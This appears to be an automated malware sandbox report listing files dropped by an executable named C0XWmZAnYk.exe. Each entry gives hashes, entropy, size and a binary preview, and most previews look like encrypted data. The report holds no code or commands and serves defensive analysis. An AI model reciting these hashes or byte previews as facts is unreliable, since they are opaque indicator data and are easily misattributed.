              SHA-256:45F5FBD172F1AA1541AB1761D90E8D862571F1204021EBA8DF8F7C77D2FAA17C
              SHA-512:E2C79544E1B2B39FD81A0788E593F8E64DA78776D78BF629B99BF1994B1FBBD6255AA57AA30C8DD0CFFBF8537B2DE03F8B2551C6A2CAD31B2DF1CB1E5ED7B439
              Malicious:false
              Preview:CMMM o..IF....s.1...F.p.. ...V..|.8Hu&.:;_D..~f.....!b.z^....7.*..|..S..R.v.P..._.s.Q.^.'...I.HbZ.w.|@.JH\..x..{..H....zh..3...k-..=.A.L......w..]...4....6.]..0c.y.=.;{#zU.Y(.]0"...|.+....\.c..z.....n"N.S.e#...[m_...-....\N.....=9.<...VX..Q+..*...a...2..)y.T.v1|.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.316594578239966
              Encrypted:false
              SSDEEP:6:22Ax3XfCw4sG1q0hn7ggQ9oMAb2NovNRLWDS87j1U8Ym7NeJ8J/NZuSi+C0mSdx6:TAx3PC+GcwnVuASNWRLW/j1U8Y6E8nZ2
              MD5:456503367A1D7623AA5092F5D17EE622
              SHA1:D31CD8F57FEFA5D230A89159026BE0072B9A58F8
              SHA-256:70D462B114CEB32998E329EEA4DB5B1644E1E443CA9C4E2876A0121D8B1A6A97
              SHA-512:C6FBF3B11D0C8C243349E9A8F0001F07642DFDA810E045F263EF1E1E12880841720177E114BD704AF371A70BB884B740BF04B95423A4EFDED75AC47F60870163
              Malicious:false
              Preview:CMMM X1..<.kS.U&..'.m...4F:.....R.Dg!..I.p.4....lo..ml_...p....1.B-..'.H...SY..?e..%.<.K.M..."....C.6.C.U8.y.G~..`lq.i..F(qM$..j...^N...1..........I...Q.=.+./o].nf..|.'b.q.z?.d.Y.......Uv....m.V..\.....lI.p\.b..jA.(.qs.wh.Y.~a..}.MY.t0...).$5TI...k..r....h..$y{6(..lkgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.258294348724995
              Encrypted:false
              SSDEEP:6:ZOPxmbUz4snFGDI9nGOmvkjg1JnrrmCln3V1g5x7TbelDaSdxa3cii96Z:ZOJmgzhnoDI9nDjLCRV1OTqdxa3cii9a
              MD5:1FF0ACCC62E892A37BC0814D36228D78
              SHA1:730DD1B0136C0A1DF8755B605AE06D13F9EB3D5B
              SHA-256:F4B0A2B08B20E98CD0E2B9CB78A260E31C78D04A75DD7A1AA1B182616BCD03CC
              SHA-512:08D2A1481773391D1F6032AFAEF66D812D7D395EC68E2307DEAA374BEDFD8A88AED429BF757DCE626AD05A9B73A1CC6FCF9FBF67393A986F507595C1AEDDA7A7
              Malicious:false
              Preview:CMMM .ph8GHYA{..)..UTb.U.T5.......z..!..+`nnbn.&.N...o1.TP..2....R.4..+.3K.H.~.^..d.@.D.....-.?t...p}h....!8.]..K.wN.~h.-.m.......&;WU#.e..b.3......+2X..u..%...z.x..<...S].;........?^.T.....^.R...A.m8?.l.zu.|m..h..i...x2Fm...Q.....Q....1.....tYo..n3n.X..wS...&ruJ..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.340029334559743
              Encrypted:false
              SSDEEP:6:V61gxtbjZJsYt26ftRHDnnTCZnnHMDKYBooIp5DK4365AaLj81uW23/nkSdxa3cq:V6mtjZJsupAMDerP3l1+vldxa3cii9a
              MD5:6495229150753FA9A9FEE5870E5A0BAD
              SHA1:7ECC47BD6CBC3937302AF3BEF7ED0FCBF0F453DA
              SHA-256:239CDEC56F5EAE490998A3D505F892C1D82389A058465BCF7686558CACDE2581
              SHA-512:C4CA1780FCC59D20B37FACA01617D0EE38644AB67C0CE0278A8900BE98C2A5F18A8BE48DDBE6A1661450AFAA852B9B2687E0341D7D7BC1645D118A2E3CF72AFF
              Malicious:false
              Preview:CMMM .~...}...H.m...0.....v.w.h.5. .._.)m.5.).F...n<..=.`.5.J.....uc|g=........2k....B^..}..Mb...{H..}:..VQ__G..m.v..*.).8,Tw.&...&.Gx.....a...&G.u..e...v._.yO....@..B......s.Jcp=_w...../.?(.:Is.F54...S...hzH.....t.l..C.....I.R.<.!6..J..U..y..,.....V.`....b.F.........gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.326909597096
              Encrypted:false
              SSDEEP:6:YvOAXXrLi+GrRdmMGvpEu4UH7Xya6Iw+9WT/U/qkLPRmfro1RZ0mSdxa3cii96Z:Yni+hMqpYUTyjIT9qU/qkPodxa3cii9a
              MD5:BC42468EEDFB198A66747E813CA8D666
              SHA1:4D9E94B2C9B3721F35ADC0576DF4479979BA33BB
              SHA-256:35FF38177D134C6AA7CDCC80C44F10B9C16DC5976FB814002AE24C637774ADD5
              SHA-512:89706D340B44ABF42549AE292D4EC338F31325A782A6AD73D17DFE032263D8735A1C1B313811C53D356D9BCCF294AF2D1FE56F7B9D661772B9F93984E8AD268C
              Malicious:false
              Preview:CMMM T.v...)..x;.f7.+..l..S..wp..."...aV.+"D.5.tKQ{....lPcO. ..et.R...du.......7....a..uJ.X......=.sA.;....@.s..`.2z..h. .g.o;...".{u....N..n.[.^m:.. .....c3.T.a~..Z....0......E.....0..A.[.....5E........dC..,....2&..).....'Z2[..4........,...R...]....O{....[.....D|.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1048910
              Entropy (8bit):1.76873714839731
              Encrypted:false
              SSDEEP:3072:yi42i7YbVpj78GOL2Ye/T8SGL1Hle3CltGKKEMBE4SD/ysX55j88:e29D5VzGLFle3Egq4E/yo5n
              MD5:C2861CBE8AE638D6625A4489A581B7D7
              SHA1:C4D0C9733503251B78C19532A6FB47DC41A50FBD
              SHA-256:514F22008D3E3A849DEABCE8B8F1A4ED30A4D137D0F4C91F5C487EA1EF10AFAB
              SHA-512:A9254636F4C4C8CE1CB07C11142AC4AD2F8A0602DFB9C70E69368B29A7B06AD3A5E7A6EC0DED79762F4F529580EC1F15DF1F9ADFEAB2785D8AC0AB7FD66A54B9
              Malicious:false
              Preview:CMMM >..o...!?Q..!.Z..R..\Hr....j.9.mX...........t.5.P...eX.../..4.c:.....Y....H..........5..J...B....%_......f.?*%.=..j93Dr.}.).u..lz.;..R..p.....d...[#..........IW(...s.r......sl.g....W....O....-.D.C...e.......j..F 0.\U..i...........!.f...Z.C.h...K.{$,.......$2.C..T....&.nP.Q..q.X......'..1..u]....Y..{7..P..R.vP..M.A.!w...+c...........2~..$[2.._...Z..5\w......G.Z@....w.......6. j6Zf....`^~...B.....Q..a...h..V..m...FO#....|i.y.?...,..._.sV2It..1P.[5..5...Q.tr..^.?r.>.o...p...#........w......].L..<.+.2...{~..0.+.-.....BJ...z..W..[._.3..C5..0Gs...7.|Y....a....+Et.AG../.?_.Fv..v.05..6"9~.'....A.Z|\.du6.$.f..^..g.K...1#...r....&-..>*...r..p....?..@.'.....ea|f6..4..-P.Z..}"brBM...x....._"..?r.?....OU..x....$...7a..R.[.}.F.eV.......HS1&y.~.:....6.U..R.G....%..]q.,..".'4d-cY.....^.*..h .f.Xx.f$.;.<...t.I5?..5..>Q...>...Qs.f..}...."N[mwz.;Xu.1q-t...):C..K.4.T...k...n..+...a$.l-.Wh"KtR..?.. .*..<Q.(...X1.Lw.n.........5s.h.q.i..o..D.o..%T.._.".
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.273413492571016
              Encrypted:false
              SSDEEP:6:ReDXzk4YmrGPJdV1pLgxH5QQOePXD7MZ2X+Y10e8ImSdxa3cii96Z:R4ItKqJvLy5FOe22XP8ILdxa3cii9a
              MD5:75A265A3231F2D0FFF642E4F31DC1FEC
              SHA1:0C33C572D93577540A904164D2D80771D059DD56
              SHA-256:11AD5B6565CBDDFEDE63DD7C468977E60ECDB8ED7ED30EEAEADA9B93F6C1A7E1
              SHA-512:B40CA081F26E6FFEFF693B7F04C2E54F13A334A2BCA5BE206247D348A1E78D8F412467D04E8963D84E7DCF5EB3E5B7F6E341546D5C9E48AD7C554E15D08BF2C3
              Malicious:false
              Preview:CMMM ~.. .....Y..K...O..S.......OH..u.....tY...u.....$.`.7P.Ax./..<)y;...h...{.\'.]..3....B..-\.z...g.JKjW.N....G1.{.].....{>_.?..|.5N.CyP.h.^...f?.D......4.j..Q\./....]`=...'..n.og....s_.;g.~L7F...}....e.?Zf......A..G.........zC...V.m......q$..9....Sv.w...}.f9r...S8gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.305834991207267
              Encrypted:false
              SSDEEP:6:eQLcfW6eoAZ7mYIQMbiyAuBjBLYwnTD5E3RE2y1kB5j5758/09E04lEev+CSdxan:eQLNK87virLNLYqyE0BpX8sAcdxa3ciD
              MD5:31DD482934E2FFCA18ECBF58E0D7E85B
              SHA1:56D728A00E42EBCA1B2A173F2AB7E7B541A294F3
              SHA-256:3BFF8807EFA73C422A4F71E6278E8372432339AE7AD1870D5D590B32DD258038
              SHA-512:190F3C1C62AC183AA478650FB746EDC8D6BFDC1C063AA62D4BE66A75E8F0E0A49B6F08171DE40DB38BBD8E27D010704E4EDFFB82EE3A816D12A841235B298876
              Malicious:false
              Preview:CMMM .:..y$|.....v;.*...X1"..E.S..|^e.ea.r.6..%(.a....V..$..|.D~.a..7.........i.D.R...G<6.U....c...6..s ....#..j........T.w..=..e..4...Sp.A..Ca.s.%....../..".....!...O..e..b~*9.g ........?N._.v4E.....!R..$xq.{8.5(......1&^*oB.1K.<YZ..j.....yR.o.z....5.bV...;.....(.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1048910
              Entropy (8bit):1.7689071855456397
              Encrypted:false
              SSDEEP:6144:8HRzbwwayBedNYWlSx/lPSptXGHqjDPaYBIU:6kdlW6VGKjpIU
              MD5:EB4493B8A3B951FA1C1664FDDCA4309D
              SHA1:5071AC8677022291E27C5EF7881A5C7257C35250
              SHA-256:0DF619352649851D697F1D1A555D3D3C3087BF382B05BB0B311017252D50F0AA
              SHA-512:79D21FC062BA9304F6D7108DDDD879648E2E5C4282AA69ACE43F7BA493CF3EB0D798A12A99E94E90A9078A69DA911EE0E44C6D815D4FEEBCFBED5CF22BB789C9
              Malicious:false
              Preview:CMMM .=\.p/..j.Jx........7......3$..._.&.......N=.<9b...nf.!..p...+6..h,.O1.Y._..z-.~....E.`...]....Z.....X+......[.wv.g..3.M.......&.V...)L...H-.....q.6...V..0.W.u...z#...sD.602....F..eQ......%_..5!...(..RA.-...;.WK......H.0..>$..p..Wh-~..A...e...D..:.B..n.=5 ..6.....J.hJ..,..fZ...M.(t......d.m8}..\........tL+Yk...@.X.x..V!...3.x...S....X.8_5WHD....m.......x.^>H@4.[#.......R9..)....#l.L.Y.TQ..6...p...?.O..p?.."no..?3.......F.=..G...C^C...' .6.:...E4..c2.].:.|....bj<9..ro...T.n..K.H...P...,....(.VY..\.3Hk....M.U.xa....{..B.S.`...F...sT......'7..r.b..|.C.{N...:U..$...c.....Z.....O..4.q?j..6P..:*...79.8?}...\f...v.m.@.8y.C..5W......Zs......1.......%._0...............h....)....6.....n4.!.~k&.9...g.{.$NM@#....vmK.7%...aEKPI....4'=c3 .9.=.. .....t..t...Vmj...;..#.3...?._S%.........?..C.^Id.|}.Y.>.{..XW...C..G...S|..r"."......$_$.wt.V(e. .8.2.0..W;...Js..EH...j.....Q..1uv..sh..j.Pz..A?d.]...#....S#b...v..C[.......U/\....^*.....n....r.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.299977109901538
              Encrypted:false
              SSDEEP:6:/96nrAp/a+uy2AX2Uqz3TImJrl/hBocrDIIBTS0EQq6VvHDzSdxa3cii96Z:V6rAp/wMUTIkRhBoJ8hEh6Vvjedxa3cq
              MD5:5ED36F396DEA6CC687C9DD447F931A91
              SHA1:A76D6F5E751317AD88425FF5DFDB96E397B6C280
              SHA-256:098E47D78D0EC60FE14279F788959AF755FF37E028AC2EC7F192335BA79E3B27
              SHA-512:504063FE6417DA6121AF249273772430F8942E9078437BFA4D3EE7A060C3C44E1F0ECC82376D22EE362E8C54E5E9E0E2B7AA83E1A4385F6A7EA8A8F00039FA12
              Malicious:false
              Preview:CMMM -g..o.L..$..e.[...95......#{.6.:j....^..A:.?..L.......'.p.....U.V.sG..O.Pu....;Y.jr.P......}.dW.......J..TA...'..8i..]s...........K+....A.>.......A...l.Z.F.......dMC.]-.f.z(.....T...Q.......q}F,0.l.....=t..%....j.....%t.>.%....tj.V..'&......d_.H.z.5.r..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):4194638
              Entropy (8bit):4.016244792412739
              Encrypted:false
              SSDEEP:24576:Zc4lVn6NVE2I8wHXEH9KPaUkr/5Tr4ImqrYE3Ax0LPJBn6SN:nfn6NVagH9Kyrr/9+qrYE3Ax0LP9
              MD5:4C6113A43F18EB4E26446DE4571C4E2A
              SHA1:0DA377168166462B70235C218A74D13622B6CBA8
              SHA-256:11776B4C211D6D38296019B8E21EB733D6A6508BD891AC0813ADCBFEA448E711
              SHA-512:4D5DEBDEF757FB7D240AE73F67B01C296E33A5892DC7FC13CC540E08B84DFB35167BF07F24C134C04D57BF7184F0BD02165941D74690F2FC0567671B91B13585
              Malicious:false
              Preview:CMMM B.D.!0*ea.c...1NB<...J.......(l.k4..P._Rvz..w.... .E.x.g..g.c.i-.-D.......b.#c.>R8C'.\[=D..o]/..W.M...7.....?..)[.q.....e.G..f......A.....o..s......Y..;.b.Nz*..nY....Q..O.z.....d.x..../...:.w0....L.PT.......E.E.X.lW.N..|..-.H..s........&..".)...i.C:....bi.hA....^.....u'5...?......g.hE..-.Ue.*.l...;..u.)......T..+.~|.G...k@v.g|.`t.r_.Sq.?..V.J.x.l~..<.p......m...%..S....N.....E.-!..*8d......#..:.k_..{....w`.2._=.9.'(....UA....T9..|.py....>..g."z.X)..N.Zh.%.~....32M.4=..7O...z.......P.4..\.r\..l..>...i...Bh..."....2...i....u.Q.w.$.9......<.Y.:......,k.j.d...8\F`-......QLC...C.oI.a_E@......K..9.@D..{<..0..f...b.:5...l'.a.fub.. &...n.,.1h...%_D....3H....eZ.I.....\....9.B.....E+...j>Kw...w..<...I.f.. A......G.hDz..Yv^..!\!.e.+B..36n9Q.....B.,.j\..W.....p..A..FP(..k...)<W..x..\..fW...8...b...:.H..5.UE.p...,>...'.E9....v.J.7Y..Ry....k.k....g|.{Q8.#..[x .X...o..).]..AJLu^jy..BF.Z....k.F. ]..5N.Ww{.........vX9../..W'...'.).Q...#..c....$..V.G.L7.Ur..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.2008599494116945
              Encrypted:false
              SSDEEP:6:eYPs2ds20WRHYYqQLefqeh/3MSmlZuT8k1mJ/GIOqhtHvBSdxa3cii96Z:eEn4YqyeSe2SYvk1OO0odxa3cii9a
              MD5:6DAC9FB9845460C6F5D1277314373F5A
              SHA1:EDB957FE3E9CDA2C12D854260E296214088F9F72
              SHA-256:79C083EF381BFE1AA1DD7ECCA3E552945D25F44B6756C58A8E4B9B4AAB810222
              SHA-512:7CF5830CB45CFA8E08B5C21535AAE804CA8343ED50FE9BA043AEF45288F95AFDBAB9C36860E6716D6820AAC23454DFFD68E3CCF063A5AA042843795B99B2F59B
              Malicious:false
              Preview:CMMM 0..}.T..u...;}.K/.a7.Q;=.u7!2j;..c..9Xq.......nm....b. W..Q.X..u...O.z...O.M......P..i...U....[.....YK%Q..e.<...}.c...W%v...F..k.Z.44...V:..8..HF.....`-$...!/.P.Gu.mg.P..Iibv...0pf......!j.#.p.e..p/w..1^h...?...v..-|..*e5.s.....Z.2.aL.dI. ...O`.P...r,AY...F........;..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.332794444990516
              Encrypted:false
              SSDEEP:6:IunKFNBXdfbq0zZC7M6uQRAK+xEJUT/09dI224KMHDB5v5YzKs5RUgmSdxa3ciik:NKFrXoI87bAku/v9s3vKlUgLdxa3ciik
              MD5:258DAF4547DC1CCFFFD08FB5A262624D
              SHA1:9C59C0E77D62683B1F973EA79F00A1F6F2459E95
              SHA-256:BD6F91E1CFF79A92BAC242F0E757D928771F44D05FD8DE9E94FC3B9C712020CC
              SHA-512:ECF3E7F057A1241D5AAF6724698020261EF36AE3FB96E8536B0B9FA0898D84C2315106DDE47013094B3F907F1723EEFB28C96C0C13C34BDF2CB6947196FF850A
              Malicious:false
              Preview:CMMM .E....!I.DO.....kF..dql.w.L.....U.......s][.......D...#.....*I,Xn.!..4..g\:h.....~B.N.}.8..Tm....6-.ln.g....{~-d..F..aA..`........w.1.S..PU...Qi..........,....d}wV..V.0hPe1m... ..0..PO6..m...A..}).n...|.......p5.......R..%.UoQ|..R........d...@)'.DW..$Z#..6Cv.b8gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.268917290128454
              Encrypted:false
              SSDEEP:6:XfJ2BTTR9SVfQmiPm8jJIE8syho/Nw5Gpavw3e2jrT5pIHU7Qvb/YRpSdxa3ciik:XR2BTTLSOQ8dImNh3eGP40EDQRwdxa3X
              MD5:EE99241AEA065A36BA4291A93D6D3BDF
              SHA1:6A29E09C8EA21B234E5893925063FA929963FB0B
              SHA-256:F070EB3B19D528AF8449DEDBEB7BF07132976126A8133B0989B20FBCF62EE0EE
              SHA-512:97C45EAC3C152C2160A59163528AC7615802B8E3B9AFAB1760A3C25A2E2B6140660429324490A87E957566908D0379A3AE3114AA71FB0747C1E83F0BE5F84569
              Malicious:false
              Preview:CMMM .M,...^V/g.V..z..."....x.1.q..Y.....H..[.+...8./p.d.P.=..}d...b.....".?.[.Z]P[...{...A...-(Q..G..~..m..!!k..Ot....{.,.6....` .l.X.......U...__.?.Y.O...#-...|.....L?...1U.2.....z..G...`."..%!.y.....&lt.."...w^X.b...: ......[K..n...&..6=Z.....3~(..Q..%...R.)......&`gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.331191336175975
              Encrypted:false
              SSDEEP:6:eawGlhjaNaxCnEqhh/3eaqlggL9+abqPCa7cvVoREdSdxa3cii96Z:eawA1w8ghZN7497qPCfNoRE0dxa3ciik
              MD5:83E0DE5F36EAE16786F8927E57E4D64E
              SHA1:24B63F3B86BF76C1B55BEA4ABF20B89CB6FB3D3B
              SHA-256:05E7734DD98F29CF1E66F9BE4BA40494BF1258AFA02CE8F1D16821CA8F72C7EF
              SHA-512:9E05F687DBF27426EF74D4637FA47750C4DC6CF5BC784F1606C50B4FE857631B85EDB967991DD21FC0E21E792E31C2527322626AA14FF27DD6E293D125CDF9C4
              Malicious:false
              Preview:CMMM 0.V......f....9./.P.V,d.../.uP>+...s..0,...".*..qx..r+.B.J.m.D.`...z/.....6._..:......`G...x.&P.7M.`..a......}.&...&......&....m.......?.iF.........0|..T...4[.V?j.9..S.....N...\..q.7.....U.R.......K.>...$pE7Z.p[cU...>.30..x..H.cz...e..B.L.CB......P...*.U.`...>...OgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.290633596024592
              Encrypted:false
              SSDEEP:6:KbWtxlohQC6SlpqnnmFgomDhwHxFh1e+kbHovEhAJcFOfPSdxa3cii96Z:KbKUlpqnmFg/hO/e9HHqJPydxa3cii9a
              MD5:010D085AE83BF6C68AF12E6C68D38316
              SHA1:47ABDD91E962BC023548593EFC69427AA47C9C70
              SHA-256:BAF8C6A38715F7B4732C1CFA6817396058171A58E2278456CCBFD6EC67ECF445
              SHA-512:405465DE55540F783AD49A69822570B0F159D27284671BE8AFC1B34D90AB02A8BF693F7C5C18E79BE7FB012A5A3A0DE211F9BEA304CE415B1C7B3CB5F074D0C4
              Malicious:false
              Preview:CMMM .)O.......l........Qs.z>D.s....cD...........|.E.K......&..f'....Gq?......m~..Fv5..#...d.T.ns...2`x....y.M..kP/...%!.'.(G..6v>....2.]..!...K..]....xAl...!~.)..f~......V?.5...z.zg...=...K..}...L#T}3.....w*.6G......|'7..g1V...l..Y.U~.|...4..,.....O..<....4..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):64281
              Entropy (8bit):7.996419157503409
              Encrypted:true
              SSDEEP:1536:t94DGMTV0VYGe3qw3MWNqmyg1oFoib+cjlEx5z14VE3IDiK:r4DGCV0q1TMsqE1oHI5ziylK
              MD5:5567FAF550543D1AB5B21DD9720748AE
              SHA1:2B62FD8F73852A7ECEFA9C0A760D28EA2BE1980A
              SHA-256:58B82364989DF0A6D818FC67CAA2AA7C7B074F3ED107351F507BE28D30863073
              SHA-512:94CBF480F54567E79C7F25717CCC8A6D9599106A4B6E86CFBF8A1C102D7F2C0D950261E41D68832E8E378E207203585AD2143117A9FA629933704AA68531D902
              Malicious:true
              Preview:<?xml;.E.,....[..v..N.9d.|.,<.e.5.Q.."J]h.1.}b...Yt...3Vt....>..x.^..|/!....:.A.:..l.......g_s...Q..........x.Y7D.=?.n&XJ.....O..d....+...h..U7....=..kk...^.....+(...U.....f.ly.n.;g...*.....=.Y.~.=...k...@\6...Y. ..a#a7..{....m....k.nd.......b.C..1.......8...a~.,*.3gYg./qt.p...[..^.].vt....V.q.,..L.or..K...X.p.6....k7..~.{....A_....URL....a.R...(.z...z8....N.l...D&..6dbu.RUK..][..e..._...My/...../.....ZP.T6.k..@.....z..~...=Q...@..n8`a..;Sb..........YwS:-..#...mX.......1...u4d..XO)TB..pX.....W.=.E....p2.t..Y..dMGd.[*@...1..~.......Gc.&..K........%..>~(.......#w../a.(.......</...>...::.-....>..J.."&.o........U...+.S....;7Z.A...{9..Q.~ZZV.+<.92*pI.I...t..8.F_..s...#..09..L&I.......f....M~4....V..D.GF.E...H..8{........w.x....|...X:..Y.j...............C.5..^<d.;yS!E.:...->.A.[..'......9.b......~.....X.....[(Xf......~.7..b...X...y...i.K~.........gL....V&........=.*X.;.MT?.p.G...st.. .....!.P....aaK...`..x.5.Q+P.`~......E....."..a..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979506255839696
              Encrypted:false
              SSDEEP:192:C2U1EEUdaLxOcZRXgW8JD4Ds7Fw5Lzw083ZL3pPMkM16hcqWf9Kb:xUGvoZPDqC5L6BhM1lY
              MD5:65693C3374B783626C078D7A5C0A675B
              SHA1:4D43DCDE28E0EE2BF25B281DF50C295FFB96B75B
              SHA-256:1DAF41E3D60A28999A6AAFE5A82CD9DB86EFB760F8CE1776B286E3C3E40249B7
              SHA-512:DB2C09DC3FB9826BC56C79189AC2F46EAEFA2C7620396598CA9244CF42CF5172333D3BF94F63526F23ABE7E773E7265D413C4F346ED201716FAB1F362FB37F01
              Malicious:false
              Preview:.......i.:....... F..yf....d*..p..K..b.1..q..l....7...Q..P1..B.~.Q.#......{.~.!(>{.F#\K@.P.;. B$.A...=....f.D*..4....h..g......Cy.)$....j.tO.....~.bdy.&..-P:&Oz.....W......s.q....m.6..&q.4.HXq..x!1M-.r.M.+.w1...<....X..e..h.....sQ.6..:1...W..5..U...7.>?.t@.0..........N.[........wh3..x.DP.|.?.).....JPXp..P{..'P...Q.....m...P.sPV. 2..'....Rm...C.-Y..K.Xi==G;5.Tg.+.H........../.P...LF...#%H.U@.sF....w.5.......9......x.I.*......_bQb&...*.W.....A.1P..&0X.$.%mg.....r........Z.O}.H\.......Q.F.B.bG.v<x.n`.`..l.q...!F...5|....1@..f..6X'4'A..?...8S.m....,.=x.%3.iev.eII.Fk.%.{L...Bw.$....T..%.4:..$.MU..xa.s...8.Os........-h...c.tr.....~P..JE6$.h........N..5\%..Y.s#@.Y....=n.F.R.....W..G....!...j...l6....%./^I.X.+.6/...U..bhC.*..]T.qR)..|.G(..C} .!.....0...).Ja.1p...2..O.......32x....3n..Z0:[.. ...qVE.jqZx.......!....dz.]Q...I.?..*j.....E).V9e..M..}...R.XKj.v4..!......~........t_..! J2..K.9.T7.;!-D..1E.#...;..'nW..p}s..h.&.U...*q...;-.-..Q..{b..o.)..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):6.43237547265883
              Encrypted:false
              SSDEEP:6144:tj1dD4Ad6JP7VONLhlo3nPltFvCTyUPR5ABk2BoPnEc/qjT1:DVxKJkVeyyUZ/qF
              MD5:3EB411C71DA2DC5F415C555869CA20A2
              SHA1:3E3E042BE4385BEBD4C59E0A2E6D4AB55F31D691
              SHA-256:BE3DE97D97E8C27CA7B1290ABEE2B234A463200D1C964C6CC20F0BEF352AD945
              SHA-512:1BC0EABEEE5B421152E34E65D76C4813E787C14D2FF5A011C05CEA1DC419498DF6A8046608138FF61D0B5A7485437F08D9AED36977FE15B69A213CC28E8C63B7
              Malicious:false
              Preview:..8....".g/..#.4.s....<*..:.h........./...tX....*}w.?).t......3+.+..h]...H....Gv.....0\...qV..2c...U.*5?W.*tl.. ..[){+.?s.{..1}.....R.K...y...#..d.xv.*...k.<.i.K.Xu.....o..95..E...u.-....K.G....}Ee....f.FA6.......'l?c.....G..G..~G...x...%......06&.n...q..iz....9.......C!..ey.5c.....Lsx.7C.;..38~i...y...u........J8..;....*U../a...o.H........nyGT...:....;. ...#0....c...[.].a..D.zY...Z.... ..s.R`..G.a.M}.....6...z..p.|s...0.D..x0&....v.N.D..b.3.,.^.5.M...L....j..#...N.t.d..K.Ic.../&..p..u......4..$u....m...n.....F..0!...0.2...y.e@..iGD.....AY...........-...@...u"..).\..?.<(.......@0..=....z8..Nl:.#..z3r|.T....g..(.w4....fTF7.mg3.*...{.KvI..r...q..bqD.M[A.8.wy...[.).E.c.1.$T.....{.C.......\........:d.....Aq.U..y...c..........u.C.&M..*...k.fB...%.........z9....v-..Q.@e.....0....q)...:."...<o.x.z!...(o.-)fxX..i..x.x..P...h..G....4k..u.[....d.?X....N.."....LfS..sk.I@D.=W.F.E...LWL?ql>......D0Z7.A..`.}R../.;....C..).Y....G...%.^.U:...;..V..U..~
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):3.2082636679293066
              Encrypted:false
              SSDEEP:3072:jUqY6ZHbzRdDWibGEWmYKjnmNmsid3/FSuGpIqq++cUmtXZByNc5Fw2lxaeYTkN:7NXR5zbV+jk1d9mtXZByNc/RueYT+
              MD5:0B99D047D19432F207DE8A59D38493F2
              SHA1:B6393CD0F84C5406AACA76D96D724C3347F91A82
              SHA-256:2D67D0B5EB5C85404F17D47B005AEC45153F0C905CA585DA3B9CADB772103827
              SHA-512:A52A6D717522F321FC1F68EAA10EDAC34BFB3C078BDE72B1118A2BE7614949590D7FDB00F49DA2E27058431D90916E2F0F780C83CCD1553782E5189130615DFA
              Malicious:false
